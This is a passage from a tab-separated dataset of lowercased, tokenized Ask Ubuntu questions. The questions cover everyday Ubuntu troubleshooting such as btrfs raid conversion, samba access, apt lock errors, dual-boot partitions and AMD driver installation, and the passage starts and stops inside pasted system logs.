type ( 0 ) [ 5580.821679 ] key4str is invalid key length ( 0 ) or type ( 0 ) [ 5580.823475 ] 1 . phy mode = 5 [ 5580.823481 ] 2 . phy mode = 5 [ 5580.824160 ] nvm is efuse and its size =2d [ 2d0-2fc ] [ 5581.732646 ] phy mode > error ! the chip does not support 5g band 5 ! [ 5581.732732 ] rtmpsetphymode : channel is out of range , use first channel=1 [ 5581.791312 ] ( efuse for 3062/3562/3572 ) size=0x2d [ 2d0-2fc ] [ 5582.157269 ] 3 . phy mode = 9 [ 5582.197224 ] antcfginit : primary/secondary ant 0/1 [ 5582.197228 ] mcs set = ff 00 00 00 01 [ 5582.991471 ] < ==== rt28xx_init , status=0 [ 5583.015043 ] 0x1300 = 000a4300 [ 5588.900248 ] === > rt_ioctl_giwscan . 13 ( 13 ) bss returned , data- > length = 1887 [ 5593.141191 ] ra0 : no ipv6 routers present [ 5595.133167 ] === > rt_ioctl_giwscan . 13 ( 13 ) bss returned , data- > length = 1911 [ 5601.572219 ] === > rt_ioctl_giwscan . 15 ( 15 ) bss returned , data- > length = 2173 [ 5606.928392 ] === > rt_ioctl_giwscan . 15 ( 15 ) bss returned , data- > length = 2173 [ 5636.958410 ] === > rt_ioctl_giwscan . 17 ( 17 ) bss returned , data- > length = 2399 [ 5660.642092 ] #
249658	can not use 'btrfs balance ' to convert to raid1	i 'm trying to convert a 2 drive btrfs array on ubuntu 12.04 to use raid1 . following the instructions on the btrfs wiki i 've tried this command , with no success : valorin @ gimli : ~ $ sudo btrfs filesystem balance start -dconvert=raid1 -mconvert=raid1 / error : 'filesystem balance ' requires 1 arg ( s ) i 've checked for documentation , but i ca n't seem to find any documentation for this command . any ideas what i 'm doing wrong ?
249660	lightirc is blank	i am trying to join an irc powered by lightirc . specifically i would like to join this one . it is simply some html embedded in blogger . i have already contacted the the person who installed this specific channel , however , my problem exists in all lightirc embeds . simply , it looks like this : that 's not supposed to happen . there is supposed to be text from the server above and a list of current users to the right . i can select a username and type messages , but i can not submit them , and the server button and the menu button to the left of the message both do jack squat . it works for others , but not for me . i believe the others are all on windows . on ubuntu this occurs in both firefox and chrome , with and without extensions disabled . when i switch to windows , it works in both browsers regardless of extension status . is there any way to fix this ? i spend 99 % of my time on ubuntu so participating in this irc would be very impractical for me if i can not fix it . i will also ask the installer for permission to post the channel here if anyone else would like to try it .
249661	issues installing qml toolkit preview	i was following the instructions from http : //developer.ubuntu.com/get-started/gomobile/ to install the qml toolkit preview , but i run into an error when trying the second step . whenever i paste this : sudo apt-get install qt-components-ubuntu qt-components-ubuntu-demos qt-components-ubuntu-examples qt-components-ubuntu-doc notepad-qml i get this : the following packages have unmet dependencies : qt-components-ubuntu : depends : libqt5core5 ( > = 5.0.0 ) but it is not installable depends : libqt5gui5 ( > = 5.0.0 ) but it is not installable depends : libqt5qml5 but it is not installable depends : libqt5quick5 but it is not installable e : unable to correct problems , you have held broken packages . any help would be greatly appreciated .
249664	how to enable ldap in xampp ?	i am trying to enable ldap in xampp 1.8.1 on ubuntu 12.10 . can any one help me out , how to do it ? when i did bit of googling , most of links were talking about windows operating system . no where i found ldap in xampp on ubuntu .
249666	installed ubuntu 12.10 with windows 8 and now windows ca n't read the disk on which the ubuntu partition is on	my current setup involves a ocz vertex 120 gb ssd with windows 8 ( label os ) on and and an 1 tb seagate hdd on which i hold data and the user profile directory of windows 8 ( label data ) . i created free space using disk management in windows on the 1 tb device and booted using the 12.10 ubuntu usb flash drive . when asked for the location of the install , i selected the free space i created in the previous step on the 1 tb device and created a new logical partition ( label ubuntu ) and a swap partition . the installation went fine with the exception of the gpu lockup that is still occurring on my desktop nvidia card . that 's another bug that i had in the past with 12.04 and i 'm still surprised to have found it on 12.10 . now although i see my data partition which contains my windows user profiles in ubuntu , when i boot into windows it does n't see it , thus i ca n't log in ( says user profile service could not find profile , obviously because the drive is seen as missing ) . starting the repair console in windows and running diskpart lists the 1 tb harddrive as `` invalid '' instead of online . is there any way i can make windows 8 see the data partition once more or will i have to backup my data and reformat it ? : / i am a linux user at work but never had to undergo the process of setting up a dual boot or installing/maintaining ubuntu . i have to say that it is quite frustrating . here 's an edit : i proceeded to reinstall ubuntu without the swap space and with a primary partition on the free space and here is what fdisk -l gives : sdb is the 1 tb hard drive and sdc is the the 120 gb ssd . sda and sdd are removable drives . disk /dev/sda : 4089 mb , 4089446400 bytes 61 heads , 60 sectors/track , 2182 cylinders , total 7987200 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc50e8c8e device boot start end blocks id system /dev/sda1 * 2888 7987199 3992156 b w95 fat32 disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x5c834909 device boot start end blocks id system /dev/sdb1 63 2047 992+ 42 sfs /dev/sdb2 * 2048 3497426943 1748712448 42 sfs /dev/sdb3 3497426944 3907028991 204801024 83 linux disk /dev/sdc : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x78bcb4b8 device boot start end blocks id system /dev/sdc1 * 2048 234438655 117218304 7 hpfs/ntfs/exfat disk /dev/sdd : 4001 mb , 4001366016 bytes 124 heads , 62 sectors/track , 1016 cylinders , total 7815168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xa2e6b78a device boot start end blocks id system /dev/sdd1 * 63 7807589 3903763+ 7 hpfs/ntfs/exfat /dev/sdd2 7807590 7807652 31+ 21 unknown
249671	continuous synchronization	i am new to linux so forgive my ignorance . i am looking to set up a mirror of my data drive . it contains photos , music and my backups from the various pc 's in the home . i use a standard 12.10 desktop as my file server . i have my data and the mirror on two identical drives . i want something that can run in the background to keep the data disk and the mirror in sync . i have tried grsync and it does the initial copy fine but does not sync again until i hit the `` go '' again . is there a way to set this up to run continuously in the back ground . i use yadis ! backup on window and it does exactly what i am after . thanks
249673	how to disable usb based on vendor id in linux environment ?	i want to disable usb based on vendor id in linux environment . i want to allow only specific usb 's only based on vendor id .
249678	how to access samba shares in lubuntu 12.10	lubuntu uses pcmanfm as it 's default file manager . i want to access my samba share with pcmanfm to upload and download files . i 've already installed the `` samba '' and `` cifs-utils '' packages and thier dependancies . installing them seems to allow me to see the windows network which i can open and see my workgroup , but i can not open the workgroup . it looks like nothing happens when i click on it , but after a minute or two i start to get `` failed to retrieve share list from server '' and `` the specified location is not mounted '' messages . i should have to authenticate a username and password before i can access the samba share , but no dialog comes up asking for any info . how can i get pcmanfm to access my shared files ?
249684	gromacs not available in repository in ubuntu 12.10 ?	i had ubuntu 11.10 and i installed gromacs on it from ubuntu software centre , but i installed ubuntu 12.10 recently and i ca n't find the gromacs simulation software in repository , any comments ?
249685	how to install ubuntu 12.04 on a system already having windows 7 ?	i have a system having hard disk of 300 gb . i have 4 partitions i.e c : // ( 40gb ) , d : // ( 80gb ) , e : // ( 90gb ) , f : // ( 90gb ) . i have installed windows 7 in c : drive , now i need to install ubuntu 12.04 on d : drive . is it possible if yes then how should i do that ?
249686	problem with updating ubuntu 12.04 lts	i 've installed ubuntu 12.04 and now i want to update it . but when i run this command sudo apt-get update , i get the following error : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ what`s the problem and how to resolve it ?
249692	is there a way to see the text of tty7 without shutting down xorg ?	is there a way to see the text of tty7 without shutting down xorg , just like switching to another tty ?
249697	is there any application like amazing slow downer for window or mac ?	is there any application like amazing slow downer for window or mac ? some of the features : change the speed of the music - from 20 % ( one fifth speed ) to 200 % ( double speed ) without changing the pitch . wrong key ? change the pitch in semi-tones - at full or changed speed . out of tune ? adjust the pitch in cents ( 100ths of a semi-tone ) to suit your instrument . real-time processing - all described above is done in real-time - just insert the cd and press the play button ! also slows down mp3 , wave , windows media audio , ogg , flac and aac/m4a files on your computer in real-time . note : m4p files from the itunes store is now supported . http : //www.ronimusic.com/amsldowin.htm
249701	how to write rtf on ubuntu ?	i have a program to read and write rtf , doc , docx , pdf , ... file . so , do you know the lib or program to process these files , especially rtf .
249702	search engine for ubuntu users	is there a good search engine to find solutions to the problems that ubuntu users face ? ask ubuntu has a lot of answers , but there are other places that have relevant information as well . google does n't seem to get to the answers very well or often enough . is there an internet search engine tailored to the parts of the web that are the linux ?
249703	why is ubuntu 12.10/12.04.1 adding unsupported updates by default ?	after installing ubuntu 12.04.1 and 12.10 respectively for over a few times , i noticed that within the software sources , by default , the unsupported updates ( precise backports / quantal backports ) are ticked . by removing that source before applying the system updates , i can clearly say that it stopped many issues , like a lack of wifi driver recognition ( see here : wifi problem after ubuntu 12.10 update ) or other issues - from originally occurring . is there any plan to update this issue towards raring ? by this i call to simply tick the *-security and *-updates only . cheers .
249706	how to set primary desktop on multiple monitors ?	i am perfectly able to set primary monitor via nvidia x server settings or displays settings . it works just fine for the most of my needs . except for one . system ignores these settings when i want to save a file to my desktop . it always saves new files to my left hand side desktop , although my primary monitor is on my right hand side . this is very annoying since i want to use my left display only for browser window , which i always keep open while on the right desktop i do all my other stuff like programming , browsing files , writing documents etc.. so how can i set my primary desktop to the same value as my primary display ? edit : i have tried to switch the cables , displays but either one does n't solve the problem . system always use left hand side desktop as a primary .
249708	problem with plymouth when installing cowsay on ubuntu 12.04	now i have problem when installing cowsay this example when installing cowsay sudo apt-get install fortune cowsay [ sudo ] password for kiriya : reading package lists ... done building dependency tree reading state information ... done note , selecting 'fortune-mod ' instead of 'fortune' fortune-mod is already the newest version . cowsay is already the newest version . the following packages were automatically installed and are no longer required : language-pack-zh-hans language-pack-kde-en language-pack-kde-zh-hans language-pack-kde-en-base kde-l10n-engb kde-l10n-zhcn language-pack-zh-hans-base firefox-locale-zh-hans language-pack-kde-zh-hans-base amarok-help-en use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 338 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up plymouth-theme-mib-ubuntu ( 0.5.0-2 ) ... update-alternatives : error : alternative path /lib/plymouth/themes/mib-ubuntu/mib- ubuntu.plymouth does n't exist . dpkg : error processing plymouth-theme-mib-ubuntu ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : plymouth-theme-mib-ubuntu
249709	how to avoid delay in output stream pipe	while i pipe nethogs it takes too much delay for the output ( about 5-200 sec instead of 1 sec depend on pipe , cmd etc ) . nethogs print output in every second . for the sake of simplicity consider the following command ( it takes abt 5 sec ) sudo nethogs ppp0 | grep e | grep e |grep c i belive it due to the buffering in pipe . how can i avoid the delay ( in general or in the case of nethogs ) ? ? ?
249710	how to add startup services ?	i 'm on 12.10 and i use synergy to share my mouse between my laptop and desktop monitors . i tend to start the synergys daemon manually , but i 'd like for it to start automatically after boot . now i 've found the answer for synergy in particular , but i 'm left wondering what the standard way of adding startup services is . what 's the way to add such startup services nowadays ? is there a graphical tool to add and manage them ?
249712	evolution calendar factory error	i 'm using ubuntu 12.10 and get this error with the evolution calendar factory . i do not know why i am getting this . the title of the error is : evolution-calendar-factory crashed with sigsegv in_nptl_deallocate_tsd ( ) the package name is evolution-data-servern3.6.0-0ubuntu3 .
249713	problem accessing ubuntu server through putty	i have just installed ubuntu 64bit on a laptop and it was an easy installation and i started the server then i downloaded and installed putty on my other pc running windows vista 32bit , both server and pc have wired connected to the router ( eminent ) . i entered my server ip , host , password etc but when i press enter to connect to my server it says network error . how can i fix this ?
249719	how to update sensors info	i have an asrock 880gm-le fx motherboard with an amd 8350 cpu . i set up sensors by saying y to everything and now when i run sensors i get w83627dhg-isa-0290 adapter : isa adapter vcore : +0.91 v ( min = +0.00 v , max = +1.74 v ) in1 : +0.00 v ( min = +1.78 v , max = +0.50 v ) alarm avcc : +3.36 v ( min = +2.98 v , max = +3.63 v ) +3.3v : +3.36 v ( min = +2.98 v , max = +3.63 v ) in4 : +1.68 v ( min = +1.97 v , max = +1.78 v ) alarm in5 : +1.70 v ( min = +2.03 v , max = +0.48 v ) alarm in6 : +1.86 v ( min = +1.90 v , max = +0.89 v ) alarm 3vsb : +3.46 v ( min = +2.98 v , max = +3.63 v ) vbat : +3.42 v ( min = +2.70 v , max = +3.30 v ) alarm fan1 : 0 rpm ( min = 1506 rpm , div = 128 ) alarm fan2 : 2860 rpm ( min = 1430 rpm , div = 8 ) fan3 : 0 rpm ( min = 1506 rpm , div = 128 ) alarm fan5 : 0 rpm ( min = 1506 rpm , div = 128 ) alarm temp1 : +43.0°c ( high = -103.0°c , hyst = +91.0°c ) sensor = thermistor temp2 : +40.5°c ( high = +80.0°c , hyst = +75.0°c ) sensor = thermistor temp3 : +32.0°c ( high = +80.0°c , hyst = +75.0°c ) sensor = thermistor intrusion0 : alarm k10temp-pci-00c3 adapter : pci adapter temp1 : +21.1°c ( high = +70.0°c ) ( crit = +70.0°c , hyst = +67.0°c ) fam15h_power-pci-00c4 adapter : pci adapter power1 : 32.21 w ( crit = 125.19 w ) i have sensors -- version sensors version 3.3.1 with libsensors version 3.3.1 how can i update the information sensors is using to get something more informative as its output ?
249720	how can i move ubuntu one to sd card in android ?	my phone often runs out of memory , the clean up wizard suggests moving apps from phone memory to sd . ubuntu one is not one the apps that is listed , could this be changed ?
249727	problem with x-configuration ubuntu 10.04	so , i 've been doing some , apparently stupid , mistakes when it comes to my system and monitor configurations . i 'm definitely a noob , just want that said . i work with the 10.04 lts , and use nvidia geforce gt 520 , graphics card . probably the newest drivers . anyway , the problem began when i wanted to set up a twinview to my tv thourgh hdmi , i worked it out and was able to get the twinview , but , when i unplugged the hdmi cable , things did n't go as i wanted them to : the desktops were really big and i could drag a window outside of the viewable parts of my desktop , seeing it go out of those boundaries when looking at the icons showing all my desktops at the bottom-left corner ( they were also bigger than usual ) . now , i did manage to fix that , or rather , it was a makeshift fix . it was now always set to 'twinview ' instead of separate x-screen and every time i had to change the settings , because it would change whenever i logged out and in again . i think this was because of not saving the settings to the 'x-config . ' file or something , which i tried later on , resulting in the mess i am in right now . so i saved the settings , having both my main screen as separate as well as the other one ( a virtual screen i think , because i 'm not using any cables or anything at this point , and restarted the x-server ( alt+print screen+k ) , which i was suggested as there was this certain window that would pop up and suggest i change what is possible or something . it logs me out and i suddenly find that the login window being outside of the viewable parton the screen ! seeing as how i could still login through just pressing enter and typing my password , i now get to be , yet again , in the part of the desktop where i ca n't see anything ! i 'm to the right of all the icons and such , to me it 's just an empty screen.. if i 'm lucky , i can approximate where i click , though i ca n't see anything , and sometimes manage to hit the shutdown option and such , but i 'm a noob so i 'm really depending on being able to see what i do . i need to fix this but do n't really know how ... help please ?
249728	how to set up a computer lab for a school ?	folks . i was recently given the task to remove windows xp from some 15 computers in a primary school , install lubuntu 12.10 on them ( all too old for gnome/unity ) and set up scratch so the students can start learning coding in a month or two . the problem is : although i 've been using linux for a decade now , i 've no idea of how to set up a `` master '' computer to deal with the updates and maybe even broadcast whatever is happening on its screen to all the `` slave '' computers in the lab . the only useful answer i found here was this one regarding the use of `` squid-deb-proxy '' to deal with the updates in an efficient way . any how tos , tutorials or tips from someone who 's done something similar ? much appreciated . thank you . theguilster
249731	is there a runic font for ubuntu 12.04 ?	i would really like a font for the elder futhark runes . i 've looked around the site and searched on the net and con find nothing .
249734	delete duplicate files with different extensions	/dir/ect/ory/ contains n folders each containing r files . of which a certain number are the same file with a different file extension . these files are both in the same folder . is there a simple way to remove one file type but keep the other only a duplicate exists ? for example : /dir/ect/ory/1/myfile1.foo /dir/ect/ory/1/myfile1.bar /dir/ect/ory/1/myfile2.foo /dir/ect/ory/1/myfile3.bar /dir/ect/ory/2/myfile4.foo /dir/ect/ory/2/myfile4.bar running the command would look something like the following : duplicate-remove -- recursive /dir/ect/ory/ -- keep=*.bar and would produce the result : /dir/ect/ory/1/myfile1.bar /dir/ect/ory/1/myfile2.foo /dir/ect/ory/1/myfile3.bar /dir/ect/ory/2/myfile4.bar as you can see , i 'm left with file1 , file2 , file3 , file4 and no duplicates , but not all the files called *.foo were deleted , only the file with a *.bar duplicate . note also that it is only the file name i 'm interested in comparing , not the the file size or data . ( a gui program would be ok also )
249739	how to install jdk in ubuntu without an internet	right now i do n't have a working internet connection on my ubuntu 12.10 . so is there a way to download some kinda archive or debian package and copy it to my ubuntu and then install it ?
249741	why i can not install homerun launcher ?	after install kubuntu ( i forgot how much i 've reinstalled the os ) , i 've installed homerun launcher many times , but since yesterday evening reinstall i couldnt find a way to install it , no package installer is finding it . i tried , sudo apt-get install homerun , sudo aptitude install homerun , tried from ubuntu software center and muon software center , nothing . none are finding it , i installed the ppa , updated all the stuff , 3 times did it and still no software .
249742	installation of ubuntu 12 in to a existing smart phone	i would like to install ubuntu 12 on my phone . it is a windows 6.5 smartphone from samsung . how can i do that ?
249743	what to do with an ubuntu disk image that appears as a winrar file ?	i 've never used ubuntu before . just heard from some friends . `` it 's great ! ! ! `` , they used to say . so i decided to try it . i downloaded wubi , and ran it but 't was takin ' too much time . so i decided to download the .iso image file separately . it could n't download more after 150 mb , and got interrupted ( and cancelled ) itself . i just went to ubuntu 's website , and further went to ask ubuntu , and searched for my question . after having found a related one , which told '' try the torrent way '' so i downloaded it through the torrent . and after that when i opened the .rar file , there was n't any .iso image file ; just some folders with names like .disc , boot , isolinux , etc . i searched for the .iso file but nothin ' there : anyone help me , please ! ! ! or this will drive me into never thinkin ' about ubuntu again .
249747	what is the life of an infinite loop send to background ?	when will an infinite loop end ? e.g . if i run while : ; do sleep 1 ; date + % s ; done & when will this end â on closing the terminal or on shutdown ?
249750	how do i download ubuntu using bittorrent on windows ?	i am trying to download and install ubuntu . i was told that downloading a torrent was a good option , as it can deal with interrupted downloads very well . where should i go to download an ubuntu torrent ? what programs should i use for this on windows ? what is the bare minimum i need to know about bittorrent for this use-case ?
249759	konsole like terminal for gnome	i would like to switch from kubuntu to ubuntu but so far i could n't find a terminal emulator for gnome which had history support like konsole does . in konsole you can set the history to be unlimited and you can have highlighted search results almost instantly . is there such a terminal emulator which would provide the same features in gnome ? this would be very essential for me .
249760	remap shortcut to a single key can not be used	i want to remap my workspace switcher shortcut to a single key , specifically the page up/page down keys for going to the top/bottom workspace . but ubuntu will not let me do this using system settings > keyboard > shortcuts , giving the following warning : the shortcut `` page up '' can not be used because it will become impossible to type using this key . please try with a key such as control , alt or shift at the same time . is there any other way to remap shortcuts to a single key ? help is appreciated !
249761	add launcher of type location to unity application launcher	i would like to open a specific file directly from the launcher . i have created a launcher ( myfile.desktop ) of type location , which works like a charm when on the desktop . i moved it to /usr/share/applications/ or ~/.local/share/applications/ so i can find it over the dash . but i can not stick it to the laucher ( which again is no problem , if i change the type to application , but then of course it does n't work any more ) . is this even possible ? i created the laucher via gnome-desktop-item-edit ~/desktop/ -- create-new and the .desptop file looks like : # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=link url=smb : //myserver/userhomes/myfiles/arbeitszeit/zeitkontrolle_6.ods name=zeiterfassung icon=/home/andsoon/icon.png
249770	installing drivers in ubuntu 12.04	first off , i am fairly new to ubuntu . anyway . i very recently bought a laptop that comes with a freedos , and a disk containing drivers . installation of ubuntu was fine . however , i think many important drivers are not installed . for example , i ca n't even connect to wifi , it detects nothing . when i also looked up the `` graphics '' of my laptop , it says unknown , although it has amd radeon hd 7670m . then i tried to use the disk that supposedly contains the drivers . however it does not work , and when i try to manually run the `` cdsetup.exe '' , a window appears where it seems to be reading the .exe file as an archive , then an error message appears ( i ca n't really paste the error message here , i am only using my phone which is my only way to the internet right now . : ( ) i think the laptop salesman told me that the disk works only ( ? ) for windows , and true enough , there 's a `` windows7 '' folder in the disk . he was n't sure if the disk works for ubuntu . do you think that 's the problem ? and if so , how do i install the drivers when i ca n't even connect to the net ? advanced thanks to anyone who answers ! ! ! your help is greatly appreciated . : ) edit : here are the results of what mr. web-e told me to type in the terminal . when i type `` lspci '' : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] 02:00.0 network controller : atheros communications inc. device 0037 ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) when i typed `` sudo lshw -c network '' : soren @ soren-cx41-1ac : ~ $ sudo lshw -c network *-network unclaimed description : network controller product : atheros communications inc. vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f7c00000-f7c7ffff memory : f7c80000-f7c8ffff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 06 serial : 8c:89 : a5:03 : d8:97 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport : d000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff when i typed `` rfkill list all '' nothing happens . : (
249771	how can i fix an issue occurring while installing the latest amd graphics driver ?	i installed the xorg-edgers ppa ( and since removed it ) and am now hitting the following errors when i try to install the official amd drivers . any help to fix this would be great : user @ ubuntu : ~/downloads $ sudo dpkg -i fglrx*.deb ( reading database ... 183095 files and directories currently installed . ) preparing to replace fglrx 2:12.100-0ubuntu1 ( using fglrx_12.100-0ubuntu1_amd64.deb ) ... removing all dkms modules done . unpacking replacement fglrx ... preparing to replace fglrx-amdcccle 2:12.100-0ubuntu1 ( using fglrx-amdcccle_12.100-0ubuntu1_amd64.deb ) ... unpacking replacement fglrx-amdcccle ... preparing to replace fglrx-dev 2:12.100-0ubuntu1 ( using fglrx-dev_12.100-0ubuntu1_amd64.deb ) ... unpacking replacement fglrx-dev ... setting up fglrx ( 2:12.100-0ubuntu1 ) ... update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group x86_64-linux-gnu_gl_conf is broken update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group x86_64-linux-gnu_gl_conf is broken update-initramfs : deferring update ( trigger activated ) loading new fglrx-12.100 dkms files ... building only for 3.5.0-22-generic building for architecture x86_64 building initial module for 3.5.0-22-generic done . fglrx : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.5.0-22-generic/updates/dkms/ depmod ... . dkms : install completed . update-initramfs : deferring update ( trigger activated ) processing triggers for ureadahead ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... setting up fglrx-amdcccle ( 2:12.100-0ubuntu1 ) ... setting up fglrx-dev ( 2:12.100-0ubuntu1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.7.0-7-generic grep : /boot/config-3.7.0-7-generic : no such file or directory warning : missing /lib/modules/3.7.0-7-generic device driver support needs thus be built-in linux image ! warning : could n't open directory /lib/modules/3.7.0-7-generic : no such file or directory fatal : could not open /lib/modules/3.7.0-7-generic/modules.dep.temp for writing : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load 